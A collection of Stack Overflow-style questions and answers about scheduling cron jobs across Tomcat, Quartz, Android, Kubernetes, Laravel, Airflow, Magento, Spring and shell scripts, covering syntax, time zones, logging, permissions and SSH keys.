You need to change the date of the underlying OS; Tomcat has no separate clock. You should also restart Tomcat afterwards.
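On a typical Linux host this boils down to something like the following; the timestamp and service name are assumptions, and GNU date syntax is assumed:
# set the clock to just before the cron trigger should fire
sudo date -s "2015-06-01 02:58:00"
# restart Tomcat so the scheduler starts against the new clock
sudo service tomcat7 restart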
I need to change tomcat server date in order to check whether my cron expression will be triggered on needed day and time or not. How can I do this?Thanks!
How to change tomcat server date?
Possible using ICronTrigger.CronExpressionString: CronScheduleBuilder csb = CronScheduleBuilder .WeeklyOnDayAndHourAndMinute(DayOfWeek.Monday, 12, 0); ICronTrigger trigger = (ICronTrigger)TriggerBuilder .Create() .WithSchedule(csb) .Build(); string cronExpression = trigger.CronExpressionString;
Is it possible using the Quartz .NET assembly to generate a cron expression? I saw that theCronScheduleBuilderclass has a private membercronExpressionwhich is essentially what I am looking for. Is there any other way to get the cron expression itself?
Create Cron Expression using Quartz .NET
If you want it to stay after the device reboots, you have to schedule the alarm again after the device reboots. You will need to have the RECEIVE_BOOT_COMPLETED permission in your AndroidManifest.xml: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> A BroadcastReceiver is needed as well to capture the ACTION_BOOT_COMPLETED intent: <receiver android:name=".BootCompletedReceiver"> <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> </intent-filter> </receiver> Lastly, override the onReceive method in your BroadcastReceiver: public class BootcompletedReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { //set alarm } } Edit: Look at the setRepeating method of AlarmManager to schedule the 'Android cron'.
How can I execute an action (maybe an Intent) on every specified time (e.g. Every day on 5AM)? It has to stay after device reboots, similar to how cron works.I am not sure if I can useAlarmManagerfor this, or can I?
How to set a persistent/regular schedule in Android?
Cron jobs are usually not executed via http servers, so use the Task Scheduler to execute the php interpreter and provide the physical path to your php script as a commandline argument.
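For example, a scheduled task that runs a PHP script every few minutes could be registered from the command line roughly like this; the executable path, script path and interval are all assumptions:
schtasks /create /tn "php-cron" /sc minute /mo 5 /tr "C:\php\php.exe -f C:\inetpub\wwwroot\mysite\cron.php"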
How would I go about setting up a PHP cron job in IIS?
How to set up a cron job for PHP on IIS?
From the Kubernetes documentation: Concurrency Policy specifies how to treat concurrent executions of a job that is created by this cron job. The spec may specify only one of the following concurrency policies: Allow (default): The cron job allows concurrently running jobs. Forbid: The cron job does not allow concurrent runs; if it is time for a new job run and the previous job run hasn't finished yet, the cron job skips the new job run. Replace: If it is time for a new job run and the previous job run hasn't finished yet, the cron job replaces the currently running job run with a new job run. In your case 'concurrencyPolicy: Forbid' should work. It will not allow a new job to be run if the previous job is still running. The problem is not with concurrencyPolicy in your case. It might be related to startingDeadlineSeconds. Can you remove it and try?
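So a spec fragment along these lines should behave as wanted; everything not shown is left as in the original CronJob:
spec:
  schedule: '*/5 * * * *'
  concurrencyPolicy: Forbid
  # no startingDeadlineSeconds: with Forbid, a run that comes due while the
  # previous one is still going is simply skipped, and the schedule continues
  # normally at the next 5-minute mark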
I need a cron job to run every 5 minutes. If an earlier cron job is still running, another cron job should not start. I tried setting concurrency policy to Forbid, but then the cron job does not run at all.Job gets launched every 5 minutes as expected, but it launches even if the earlier cron job has not completed yetspec: concurrencyPolicy: Allow schedule: '*/5 * * * *'This is supposed to solve the problem, but the cron job never gets launched with this approachspec: concurrencyPolicy: Forbid schedule: '*/5 * * * *'Setting the startingDeadlineSeconds to 3600, or even to 10, did not make a difference.spec: concurrencyPolicy: Forbid schedule: '*/5 * * * *' startingDeadlineSeconds: 10Could someone please help me here?
How to prevent a Cronjob execution in Kubernetes if there is already a job running? concurrencyPolicy:Forbid stops the cron job execution altogether
Not sure about GitLab CI specifically, but cron syntax is minute, hour, day of month, month, day of week, meaning a job which should run every weekday at 6am is 0 6 * * 1-5
I was wondering if anyone knew how to create a cron job that runs from monday to friday at 6am.I am using gitlab CI, quickly looked at the example syntax and am not exactly sure how to limit it to occur from monday to friday.
Cron job for every weekday at 6 am
You can achieve this with 2 components: an artisan console command and task scheduling. Create a console command which deletes old items, then schedule the command to run every minute. First we'll create the console command: scaffold a new console command using php artisan make:command TruncateOldItems. Within your new command define $signature as items:truncate and include a description in $description. From within the handle method select all items that meet your conditions, then run delete() on them, e.g: public function handle() { Item::where('datetime', '<', Carbon::now())->each(function ($item) { $item->delete(); }); } Then we'll schedule the command: open App\Console\Kernel.php and, from within the schedule method, schedule your command: $schedule->command('items:truncate')->everyMinute(); Start the scheduler by adding a cron entry: * * * * * php /path-to-your-project/artisan schedule:run >> /dev/null 2>&1 Notes: You'll need to swap out Item for your model, and include both your model and Carbon in the command class with use App\Item and use Carbon\Carbon at the top of the console command class.
I have a database table which fetches some information from an API.The columns areid datetime name 10011 2018-01-26 somethingWhat I am looking for is to delete this entry, since it's date now is in the past.Is there a way to specify a cron job in Laravel, which automatically deletes the column - which has an entry ofdatetimeand which is on past?
Laravel delete records of table for past date automatically
This can be done using the Global Class, and over riding the onstart method.https://www.playframework.com/documentation/2.5.x/JavaGlobalAn abstract view of the coding is given below. Hope this helppublic class Global extends GlobalSettings { private Cancellable scheduler; @Override public void onStart(Application application) { int timeDelayFromAppStartToLogFirstLogInMs = 0; int timeGapBetweenMemoryLogsInMinutes = 10; scheduler = Akka.system().scheduler().schedule(Duration.create(timeDelayFromAppStartToLogFirstLogInMs, TimeUnit.MILLISECONDS), Duration.create(timeGapBetweenMemoryLogsInMinutes, TimeUnit.MINUTES), new Runnable() { @Override public void run() { System.out.println("Cron Job"); // Call a function (to print JVM stats) } }, Akka.system().dispatcher()); super.onStart(application); } @Override public void onStop(Application app) { scheduler.cancel(); super.onStop(app); } }
I'm using Play 2.3.8(activator) & Mongodb as dbI've some products in products collection and each product has expiry date and once its expiryI need to remove documents in products collection.I'm planing to write cron job to remove documents in products collection which will run every day at once in particular time.I'm thinking I can use Annotations like @on, @Every in java(I'm writing code in play java, not play scala). but when I googled i got some plugins or tools or solutionsa)https://github.com/ssachtleben/play-plugins/tree/master/cronb) Quartz Job schedular as dependency to play 2.3(activator)c) Akka async jobs(I don't how to use this, how to intigrate with play and even I'm new to Akka)I'm in confusion state, Could you please suggest me in followingwhich one I can use for my requirement?Am I in correct path to do my job?Is there any thing which will do my job at database level? Thanks in advance.
how to write cron job in play framework 2.3
I think you've got one too many *'s there. And yes, you can set the PATH variable in cron, in a couple of ways. But your problem is the extra *.
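With the extra field dropped, the entry from the question becomes:
* * * * * echo 'leon trozky' >> /Users/whitetiger/Desktop/foo.txt 2>&1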
I have made a simple cron job by typing the following commandscrontab -ethen in the vi file opened I types* * * * * * echo 'leon trozky' >> /Users/whitetiger/Desktop/foo.txt 2>&1the filefoo.txtindeed gets created, but its content is/bin/sh: Applications: command not foundI'm guessing this has to do with the PATH value ofcron. Is there any way to set the PATH in thecronfile such that when I transfer it to another mac I won't have to set the PATH manually? is this even a PATH problem?
cron problems running very basic commands
Use "whoami" in your script runbackup.sh will shows who is excuting the shell.Every user's cron job will start a shell process. So Every whoami show the running users' name.Pls note that: All Users have permition to files mentioned in runbackup.sh.
As root, I can add user specific cron job bycrontab -u user1 -e. There I can mention a shell script sayrunbackup.shto get executed.Sincerunbackup.shscript is used for many users, the script need to know the username (hereuser1) to do some user specific actions.How the runbackup.sh could get the username when cron job invokes it?Thanks,
Getting username while cron job is invoked
That's not garbage, that is the correct remote address. Someone used IPv6 to access your server.
I have a PHP script sitting on a server that is hit by several different machines at different times throughout the day based on cronjobs that are setup on each machine. I'd like to know the IP of the machines making the request and when it is made by a browser, the following executes successfully:<?php ... echo $_SERVER['REMOTE_ADDR']; ... ?>However, when made by CURL or any other command line tool I have attempted to use (lynx included), I end up with the following garbage:2701:5:4a80:7d:2ee:8eff:5e61:801dFrom the investigation I've done, this is a result of Apache not populating the$_SERVERvariable for requests received that are made from the command line.REMOTE ADDR Issue with Cron JobAnyone know of a way to get command line requests to play nice with the$_SERVERvariable or should I go down another route?
"Garbage" IP address with colons in $_SERVER['REMOTE_ADDR'] for some clients
On Magento and Cron setups, use cron.sh to do the triggering. Also I believe inTrust but verifywhich means set up cron and then actually view the cron job output table for proper runs.Go into your Advanced System Config and set Cron Success History Lifetime and Failure Lifetime both to 1440 so you are monitoring a 24 hour span of time.You will now be able to see index operations, etc in the time stream. There will be about 300 jobs listed in your Jobs Successful section over the 24 hour timespan.Now run thiscron log monitorto see if your cron really is running. I've run into many times when the person says it is, but then tries to verify it and finds that it pooped out after a couple tries.The next issue is the statementBut if I check the file /app/code/core/Mage/Sitemap/etc/config.xml it seems to be not updated. First, this is a configuration template, it will not update. The enable is done in the database. You check it in System -> Config -> Catalog -> Google Sitemap -> Generation Settings -> Enable = Yes should be the setting and once saved, stays on Yes. Magento consults this setting stored in the database, not the config.xml to actually run the sitemap generation.Now if you've got the sitemap properly created under Catalog -> Google Sitemap, the date/time stamp on your actual sitemap.xml file should start updating.
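For completeness, the usual way to wire this up is a system crontab entry pointing at Magento's cron.sh; the path and interval here are assumptions:
*/5 * * * * /bin/sh /path/to/magento/cron.sh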
I'm a newbie in Magento. I'm tring to configure an auto-generated Google Site Map. I've read everywhere how to set up cron job for Magento with cPanel, how to configure from backend and so on.My current settings: under System -> Configuration -> Google Sitemap -> Generation Settings -> Enabled = YES. I've create the sitemap on Catalog -> Google Sitemap, of course, which I can manually generate without any problem.But if I check the file/app/code/core/Mage/Sitemap/etc/config.xmlit seems to be not updated (different content btw config.xml and backend). It seems also that the last update on filesystem is perormed on 20/04/2012, instead of today. (I've also run the Fluch Magento and Storage Cache)<generate> <enabled>0</enabled> <error_email/> <error_email_template>sitemap_generate_error_email_template</error_email_template> <error_email_identity>general</error_email_identity> </generate>Can someone help me out? Thanks!
Magento and Google Sitemap - Cron
You basically have two options: change the system wide timezone, or make your DAG timezone aware. 1. Change the system wide timezone In your airflow.cfg you can define what the scheduling timezone is. For example, for Amsterdam it would be: [core] default_timezone = Europe/Amsterdam This will set the complete Airflow installation to schedule based on Amsterdam times. 2. Make your DAG timezone aware If you supply a start_date that is timezone-aware, it will use that timezone to keep track of daylight saving time, as mentioned in the Airflow documentation. The following example is copied directly from the Airflow documentation and illustrates how to make your DAG timezone aware. import pendulum local_tz = pendulum.timezone("Europe/Amsterdam") default_args=dict( start_date=datetime(2016, 1, 1, tzinfo=local_tz), owner='airflow' ) dag = DAG('my_tz_dag', default_args=default_args) op = DummyOperator(task_id='dummy', dag=dag) print(dag.timezone) # <Timezone [Europe/Amsterdam]>
I have an airflow scheduler which has UTC as its time zone. I would like to schedule a DAG based on EST timings. The issue here is I want to schedule my DAG to run from 6 PM to 9 PM EST every Mon-Fri. Converting EST to UTC 6 PM becomes 10 PM and 9 PM becomes 1 AM of the next day.I tried giving crontab expression based on UTC -'0 10-23,1 * * MON-FRI'but due to varying time zones my DAG will skip run of 0 AM to 1 AM (8-9 PM EST) on Fridays. Kindly help me with achieving the proper scheduling for this.Any help is appreciated.
Scheduling a DAG in EST time zone - Airflow
Cron will send the STDOUT and STDERR from the script by email. >> /var/log/test.log 2>&1 ... but your script has redirected them both to a file, so there isn't any data to send. Remove the redirect if you want the data to appear in an email instead.
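In other words, a crontab along these lines will mail whatever the script prints; the address is a placeholder:
MAILTO=you@example.com
*/2 * * * * python3 /var/test.py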
I have installed both Postfix and sendmail, and then tried to set up cron for a Python script; I want cron to send an email. My cron schedule looks like: [email protected] */2 * * * * python3 /var/test.py >> /var/log/test.log 2>&1 Still cron is not sending any email. Please help, what do I need to do more?
Cron not sending email
Usually, when you want more granularity than 1 minute, you have to write a daemon.I advise you to try, now it's not so hard as it was some years ago. Just start with a simple loop inside a CLI command:while (true) { doPeriodicStuff(); sleep(1); }One important thing: run the daemon viasupervisord. You can take a look at articles about Laravel's queue listener setup, it uses the same approach (a daemon + supervisord). A config section can look like this:[program:your_daemon] command=php artisan your:command --env=your_environment directory=/path/to/laravel stdout_logfile=/path/to/laravel/app/storage/logs/your_command.log redirect_stderr=true autostart=true autorestart=true
I have a project that needs to send notifications via WebSockets continuously. It should connect to a device that returns the overall status in string format. The system processes it and then sends notifications based on various conditions.Since the scheduler can repeat a task as early as a minute, I need to find a way to execute the function every second.Here is myapp/Console/Kernel.php:<?php ... class Kernel extends ConsoleKernel { ... protected function schedule(Schedule $schedule) { $schedule->call(function(){ // connect to the device and process its response })->everyMinute(); } }PS: If you have a better idea to handle the situation, please share your thoughts.
Laravel schedular: execute a command every second
If you want time stamped logs, you append the output of a formatted date command, e.g. date +%d-%m-%y for day-month-year in numeric format. You can use backticks to put that string into the cron command, for example as part of the log file name: /home/me/cron_log-`/bin/date +\%d-\%m-\%y` So the file name will have the current date appended to it. The backticks say "run this command and put the output here as a string". (Remember that inside a crontab line the % characters have to be escaped as \%.) Now the problem is that your directory might get huge and then you have to write a short script to delete the old ones by time. I have a script that reads the format and keeps X and deletes the rest, but most people would just use "find" to delete older stuff by time, like logs that have mtime > 1 year.
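To keep the log directory from growing without bound, a cron'd find is usually enough; the schedule and retention period here are assumptions:
# delete date-stamped logs older than a year, every night at 04:00
0 4 * * * find /home/me/cron_logs/homedir_backups -name '*.log' -mtime +365 -delete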
I have figured out how to output cron jobs to a log file using >> and providing a path to the log file. The >> appends log information to the existing file. How can I make it so the cron job creates a new log file every time it runs? (i.e. rsync.log, rsync(1).log, rsync(2).log; ideally though I'd like the file name of the log to be something like DD-MM-YY.log). I want a separate log file so this one log file doesn't get so huge, and if/when we go to look whether a file/folder was successfully backed up (I'm running an rsync command in the cron job) we don't have to comb through a MASSIVE log file. Additionally, when the cron job output goes to the log file, there are no time/date references. Example of my first log output: **sending incremental file list** **sent 78 bytes received 11 bytes 35.60 bytes/sec** **total size is 0 speedup is 0.00** That's it. The timestamp on this logfile will keep changing every time the job is run, so we wouldn't even be able to tell what day that particular file/folder was copied via rsync. If I had a separate log file for every time the cron job ran, I could just open the log file for the particular date that it was created and view what was backed up. My current cronjob: */1 * * * * rsync -avz /home/me/test/ [email protected]:test/ >> /home/me/cron_logs/homedir_backups/rsync.log 2>&1 I only have it set to 1 minute for testing purposes. Eventually this will only run daily at midnight.
New log file every time cron job runs
1- Create a batch file such as starter.bat and type NET START "SERVICE NAME" in it. 2- Create a task in Task Scheduler for 7:00 a.m. that runs the batch file every day, and remember to check "Run task as soon as possible after a scheduled start is missed" in the Settings tab so it will start even if the system boots up after 7 a.m. Repeat those steps with a stopper.bat that includes NET STOP "SERVICE NAME", scheduled for 23:00.
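A rough sketch of the pieces; the service name and paths are placeholders, and the "run after a missed start" option still has to be ticked in the Task Scheduler UI:
REM starter.bat
NET START "My Service Name"
REM stopper.bat
NET STOP "My Service Name"
REM register the daily 07:00 / 23:00 triggers from an elevated prompt
schtasks /create /tn "StartMyService" /tr "C:\scripts\starter.bat" /sc daily /st 07:00
schtasks /create /tn "StopMyService" /tr "C:\scripts\stopper.bat" /sc daily /st 23:00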
I've a .NET windows service that should start at 7:00 and stop at 23:00 each day, running continuously in background.While I can code the service so that it sleep between 23 and 7, I would prefer a system configuration (something likecronin unix).How can I do this on Windows 7?Note that, if system boot up after 7:00, the service should start immediatly.
How to schedule the start and stop of a Windows service?
I just had to do this. If you just want to check if the box you are on is floating the public ip and the ip is, say, a.b.c.d, then it is enough to run:ip a | grep a.b.c.dI'm pretty sure in bash you can use the output of that command as a conditional itself. If the machine is not floating the public ip, the output should be empty, hence evaluate to false and if there is a match for the ip, then it should evaluate to true.
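A sketch of how the cron'd wrapper could use that check; the VIP placeholder is from the answer and the PHP script path is hypothetical:
#!/bin/bash
VIP="a.b.c.d"                            # the keepalived virtual IP
if ip a | grep -q "$VIP"; then
    php /path/to/the_real_cron_job.php   # only the node currently holding the VIP runs the job
fi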
I have 2 app servers both configured to run a php cron job, but only 1 can run the job at any time. Since I am already using keepalived for other purposes, I am thinking of having some logic in the cron job to check if the node has the virtual ip, then execute the job. So theoretically even though both servers are running the cron job at the same time, only 1 will be executing the 'real' job.But my question is how to check if the node has the vip? Can someone advise me on that?Thanks.
keepalived check which is master node
Yes, this is correct; you can verify it with a cron expression evaluator. The hour field takes 0-23, so it will fire at 3 AM only.
I am using Java - Spring - Quartz Scheduler. I want to run job by 3 AM in the morning and following is my cron expression.0 0 3 * * ?Can somebody tell me is it the correct one? Will it execute twice in 24 hour 3 PM and 3 AM?
Spring cron expression for 3 AM
The probable answer is that the cron job executes under your user, and the directory is owned by apache (or www-data or nobody or whatever user your web server runs as). To get it to work, you could set up the cron job to run as the web server user. Something like this: su -l www-data -c 'crontab -e' Alternatively, you could change the permissions to 775 (read-write-execute for the owner and group, and read-execute for others) and set the group ownership of the folder to the user running the cron job. However, you have to make sure that if you're deleting something or descending into a folder which was created by apache, you could still run into problems (apache would create a file which it itself owns, and your user then cannot delete it, regardless of the directory permissions). You could also look at something like suphp or whatever is current these days, where the web server processes are run under your username, depending on your system architecture.
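If you go the group-ownership route, the commands are roughly as follows; the group name depends on your distro (e.g. apache or www-data) and the path is a placeholder:
chown youruser:www-data /path/to/temp/folder
chmod 775 /path/to/temp/folder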
I have a folder above the webroot that is used to temporarily store user files generated by a php web application. The files may, for example, be PDF's that are going to be attached to emails.The folder permissions are set to rwxr-xr-x (0755). When executing a procedure from the web application, the files get written to this folder without any issues.I have now also set up a cron job that calls the php script to execute that exact same procedure as above. However, the PDF cannot be saved into the above folder due to failed permissions - the cron job reports back apermission deniederror.I have tried setting the folder permissions to 0775 and still get a permission denied. However, when the permissions are 0777, then the cron job then works fine.This seems very strange to me - why does the cron get a permission denied at 0755 but it works fine through the web app?
Cron job and folders permissions - permission denied
As explained in this duplicate thread:PHP & cron: security issuesYou should keep this file outside of public_html.Sometimes, though, this is not possible. My mind went toMoodle, where a similar feature exists. This is what they do.Fromcron.php:... /// The current directory in PHP version 4.3.0 and above isn't necessarily the /// directory of the script when run from the command line. The require_once() /// would fail, so we'll have to chdir() if (!isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['argv'][0])) { chdir(dirname($_SERVER['argv'][0])); } ... /// check if execution allowed if (isset($_SERVER['REMOTE_ADDR'])) { // if the script is accessed via the web. if (!empty($CFG->cronclionly)) { // This script can only be run via the cli. print_error('cronerrorclionly', 'admin'); exit; } // This script is being called via the web, so check the password if there is one. if (!empty($CFG->cronremotepassword)) { $pass = optional_param('password', '', PARAM_RAW); if($pass != $CFG->cronremotepassword) { // wrong password. print_error('cronerrorpassword', 'admin'); exit; } } } ...
I know how to run a script with a cron, but what I need is to be able to run my script only by a cron.Thank you!
run php script only by cron
You just have to create the cron file, then use exec to set up that cron:$cron_file = 'cron_filename'; // Create the file touch($cron_file); // Make it writable chmod($cron_file, 0777); // Save the cron file_put_contents($cron_file, '* * * * * your_command'); // Install the cron exec('crontab cron_file');This requires that the user which PHP is run under has the right to make crontabs. This cron file will by default replace any other crons for that user, so make sure to ask the user if he wants to apply the cron. Also make sure the folder you're writing the crontab file in is writable.
I'm developing a web application that requires the use of Cron. I'd like to make it easy to set up with an auto-install process like Wordpress. I have no problems writing the install script up until it's time to set up Cron. Please tell me if I can do this.
Install a cron job with a php script
I believe you are using the wrong kind of quotes. Plain-quoting ssh-agent doesn't do anything; you need to incorporate the results of running it by using command substitution with: eval `ssh-agent` or eval $(ssh-agent) This causes the script to set the needed environment variables. However, ssh-agent still will not have any keys unless you ssh-add them. If your keys have no passphrase, then ssh-add can simply be run from the script. If your private key does have a passphrase, you might want to run this script as a daemon rather than a cron job. This would allow you to connect to the agent and add your private keys. The real reason the script works from the command line is that your desktop environment is probably running ssh-agent and it arranges for the needed environment variables to be propagated to all your terminal windows (either by making them be children and inheriting the variables, or by having your shell source the necessary commands). I'm guessing you are running ssh-add at some point in your normal workflow?
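Concretely, the top of the script would then look something like the following sketch, assuming the key has no passphrase:
#!/bin/sh
eval "$(ssh-agent -s)"        # start an agent for this cron run and export its environment variables
ssh-add "$HOME/.ssh/id_rsa"   # load the key; only non-interactive if the key has no passphrase
# ... git pull / git push loop as before ...
eval "$(ssh-agent -k)"        # tear the agent down again at the end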
I've put this script together to updated a folder of forked Github repositories on a daily basis. It runs fine if I call it from a prompt, but I can' figure out how to make it utilize my id_rsa reliably when it is run as a cron job. theeval 'ssh-agent'is an attempt to do just that, but it doesn't seen to have any positive affect.#!/bin/sh LOGPATH=log.txt eval 'ssh-agent' cd /path/to/update/folder echo "-------START UPDATE-------">$LOGPATH echo "Updating repos:">>$LOGPATH date "+%F %T">>$LOGPATH COUNT=1 find . -maxdepth 1 -type d | while read dir; do cd "$dir" LEN=$"${#dir}" if [ $LEN != "1" ] then echo "*********">>$LOGPATH echo "$COUNT. " ${dir:2}>>$LOGPATH /usr/local/bin/git pull upstream master>>$LOGPATH 2>> $LOGPATH /usr/local/bin/git push origin master>>$LOGPATH 2>> $LOGPATH let COUNT=COUNT+1 fi cd "$OLDPWD" done echo "-------END UPDATE-------">>$LOGPATH exit 0This is probably a horribly inefficient way to go about the process in general, but it works and I don't ever see it. If I could get it to use my creds, I would be elated.
Accessing SSH key from bash script running via a cron job
Unless the Linux version is very different, under Settings > Advanced > Updates there are settings you can disable that are concerned with the automatic searching for updates for Firefox and its add-ons. In "about:config" you can set "browser.sessionstore.enabled" to false, in which case Firefox will not restore your tab state after a crashed browsing session.
I start Firefox (Linux) via the command line using a cron job. When there is no update for the add-ons, it starts up normally and then I can tell it what to do. However, if there is an update for an add-on, then it asks whether to take that update or not. I don't have the ability to detect the pop-up window and choose no. So, how can I disable all questions upon startup of Firefox? Questions like: Do you want to update add-ons? Do you want to upgrade Firefox? Do you want to open previous tabs or a new session? I pretty much would like to keep my version of Firefox the way it is and not have any questions asked. When I start Firefox, I would like to have it start nice and clean without any questions.
How to disable Firefox add-ons update check on start [closed]
Change the first * to 0, i.e. use "0 54 22 * * ?". With a star you are saying "every second"; replacing it with a 0 (or any other number 0-59) will have it run on that second instead of all of them.
My job is running every at the time specified but its running every second of time specified, for example if I set a job to run at 22:54 it will run every second from 22:54:00 until 22:54:59. I want it to just run once at the time specified...any help is much appreciatedmy code:@Scheduled(cron = "* 54 22 * * ?") public void getCompaniess() { System.out.println(new Date()+" > Running testScheduledMethod..."); }output:Thu Mar 12 22:54:00 GMT 2020 > Running testScheduledMethod... Thu Mar 12 22:54:01 GMT 2020 > Running testScheduledMethod... ..... Thu Mar 12 22:54:59 GMT 2020 > Running testScheduledMethod...
Spring scheduled cron job running too many times
Update, using Django 2.0.6 + AWS Elastic Beanstalk + cron job: I found I needed to export the AWS environment variables using source /opt/python/current/env to prevent manage.py from throwing the error "The SECRET_KEY setting must not be empty". This is because I had placed my Django secret key in the os.environ for Beanstalk, which it seems is not accessible by shell/cron by default. See https://forums.aws.amazon.com/thread.jspa?threadID=108465 My final cron job .txt script was as follows (process_emails is my own Django management command, myjob.log is where the output of the command is logged): */15 * * * * source /opt/python/run/venv/bin/activate && cd /opt/python/current/app/ && source /opt/python/current/env && python manage.py process_emails >> /var/log/myjob.log 2>&1
I'm having trouble getting my cron jobs to execute.Setup:Django - 1.9Elastic beanstalk - 64bit Amazon Linux 2016.03 v2.1.3 running Python 3.4I've tried doing this a couple of ways so far:Using a cron.yaml file: Didn't touch anything else - just added a cron.yaml file to my project root folderversion: 1 cron:- name: "test" url: "http://website.com/workers/test" schedule: "*/10 * * * *"Using a container command and a separate cron.txt file:Added this line in my .ebextensions/development.config file05_some_cron: command: "cat .ebextensions/crontab.txt > /etc/cron.d/crontab && chmod 644 /etc/cron.d/crontab" leader_only: trueand in .ebextensions/crontab.txt*/10 * * * * source /opt/python/run/venv/bin/activate && python mysite/manage.py testThe app deploys successfully in both cases.Manually (in a browser) going tohttp://website.com/workers/testhas the intended outcome (in the first case).Addingsource /opt/python/run/venv/bin/activate && python mysite/manage.py testas a management command runs the correct script once on deploying.The logs do not show any GETS on that url.What am I doing wrong? Am I missing some step of the process or some setup step on EBS?Also what is the best ways to run cron jobs for django applications hosted on EBS? - django apps can run management commands either from the command line as in attempt 2 or by extending a GET or POST url as in attempt 1.
Running cron jobs on aws elastic beanstalk - django
One option is to test whether the script is attached to a tty.#!/bin/sh if [ -t 0 ]; then echo "I'm on a TTY, this is interactive." else logger "My output may get emailed, or may not. Let's log things instead." fiNote that jobs fired byat(1)are also run without a tty, though not specifically by cron.Note also that this is POSIX, not Linux- (or bash-) specific.
Is it possible to identify, if a Linux shell script is executed by a user or a cronjob?If yes, how can i identify/check, if the shell script is executed by a cronjob?I want to implement a feature in my script, that returns some other messages as if it is executed by a user. Like this for example:if [[ "$type" == "cron" ]]; then echo "This was executed by a cronjob. It's an automated task."; else USERNAME="$(whoami)" echo "This was executed by a user. Hi ${USERNAME}, how are you?"; fi
How-to check if Linux shell script is executed by a cronjob?
Something to consider is that a standard valid cron expression will always refer to a valid time in the future. The one caveat to this is that Quartz cron expressions may include an optional year field, which could be in the past as well as the future.To check the validity of the expression, you can build aCronExpressioninstance then ask it for the next valid future time; anullindicates that there is no valid future time for the expression. Here's a quick unit test example:@Test public void expressionTest() { Date date; CronExpression exp; // Run every 10 minutes and 30 seconds in the year 2002 String a = "30 */10 * * * ? 2002"; // Run every 10 minutes and 30 seconds of any year String b = "30 */10 * * * ? *"; try { exp = new CronExpression(a); date = exp.getNextValidTimeAfter(new Date()); System.out.println(date); // null exp = new CronExpression(b); date = exp.getNextValidTimeAfter(new Date()); System.out.println(date); // Tue Nov 04 19:20:30 PST 2014 } catch (ParseException e) { e.printStackTrace(); } }Here's alinkto the QuartzCronExpressionAPI.
I am designing a scheduler and using quartz library. I want to check whether cron expression time refer to the time in the future, Otherwise trigger won't be executed at all. Is there any way of comparing cron expression time with current time in java.
compare Cron Expression with current time
if it isn't a user issue (where you run the job as root, missing the right $HOME/.ssh folder), it can be apassphrase issue:turns out I was mistaken, and the ssh key was password protected (with keychain loading the ssh-agent), hence why it failed from a script but not when running from the bash session.Adding. ~/.keychain/$HOSTNAME-shto my script resolved the problem.The passphrase bit is detailed in "Not able to ssh in to remote machine using shell script in Crontab":You can make ssh connections within a cron session. What you need is to setup a public key authentication to have passwordless access.For this to work, you need to havePubkeyAuthentication yesin each remote server'ssshd_config.
I have created an SSH key (followingthe official tutorial), added it to GitHub and created a Bash script that commits and pushes a single file to my repository on Github. When I run this script from the command line, everything works fine and the updates are pushed. However, when I set up a job usingcrontab -e, the push generates the following error:Permission denied (publickey). fatal: The remote end hung up unexpectedlyI have edited the user's crontab (crontab -e), i.e. I'm NOT usingsudo crontab -e. I'm running Ubuntu 12.04.
Pushing to GitHub using a cron job -- Permission denied (publickey)
I do not see the purpose of that, and there is probably a better way to do it, but I think it could be done like this: I have never had this case, but you can probably use the Mage_Cron_Model_Schedule class (Mage::getModel('cron/schedule')), set its data accordingly, and then save it. You still need to define the cron task in a config.xml for Magento to be able to associate it. This should populate the cron_schedule table, which is checked for the cron tasks to be run.
I want to create cron job task programmatically without using config.xml file. Is it possible?
Create Magento cron job task programmatically
Try to make bin/rails executable:chmod u+x bin/railsThis is, of course, assuming that bin/rails is owned by the crontab's user.
I have set up a cron with whenever, but it's not working. I tried to run the command manually and I get the error /bin/bash: bin/rails: Permission denied. Here is what the command of the cron looks like: /bin/bash -l -c 'cd /var/www/domain.net/main && bin/rails runner -e production '\''User.weekly_update'\''' I also tried to run this command as root but I got the same message.
Whenever - Cron not working? Permission denied